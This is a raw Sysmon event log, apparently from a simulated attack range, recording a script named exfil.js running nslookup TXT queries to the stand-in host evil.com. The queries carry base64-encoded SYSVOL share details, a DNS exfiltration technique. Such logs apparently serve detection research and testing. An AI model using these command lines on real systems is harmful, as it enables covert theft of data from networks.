14:21:49.551{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-1F46-000000005F02}7668C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.535{2E1864BB-18FD-629A-1F46-000000005F02}76684908C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-1E46-000000005F02}5216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.535{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1F46-000000005F02}7668C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.520{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.520{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.520{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.520{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.520{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1E46-000000005F02}5216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.520{2E1864BB-18E0-629A-6742-000000005F02}39767960C:\Windows\System32\WScript.exe{2E1864BB-18FD-629A-1E46-000000005F02}5216C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.529{2E1864BB-18FD-629A-1E46-000000005F02}5216C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlerv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.520{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltdf.tmpMD5=D1A54A6F21A90F6B3FDD9CFE56E9C930,SHA256=5C5F1828A4B86FD4EE344674F6FC0762ED42C1A295A6FDEB230A8253C2750995,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.499{2E1864BB-18FD-629A-1C46-000000005F02}80323568C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-1D46-000000005F02}1104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.499{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.482{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.482{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.482{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.482{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1D46-000000005F02}1104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.482{2E1864BB-18FD-629A-1B46-000000005F02}71442556C:\Windows\system32\cmd.exe{2E1864BB-18FD-629A-1D46-000000005F02}1104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.495{2E1864BB-18FD-629A-1D46-000000005F02}1104C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FD-629A-1B46-000000005F02}7144C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltdf.tmp 2>&1 10341000x8000000000000000215013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.467{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-1C46-000000005F02}8032C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.467{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-1C46-000000005F02}8032C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.467{2E1864BB-18FD-629A-1C46-000000005F02}80323568C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-1B46-000000005F02}7144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.451{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1C46-000000005F02}8032C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.436{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.436{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.436{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.436{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.436{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1B46-000000005F02}7144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.436{2E1864BB-18E0-629A-6742-000000005F02}39766520C:\Windows\System32\WScript.exe{2E1864BB-18FD-629A-1B46-000000005F02}7144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.449{2E1864BB-18FD-629A-1B46-000000005F02}7144C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltdf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.436{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmac.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.420{2E1864BB-18FD-629A-1946-000000005F02}41287156C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-1A46-000000005F02}7172C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 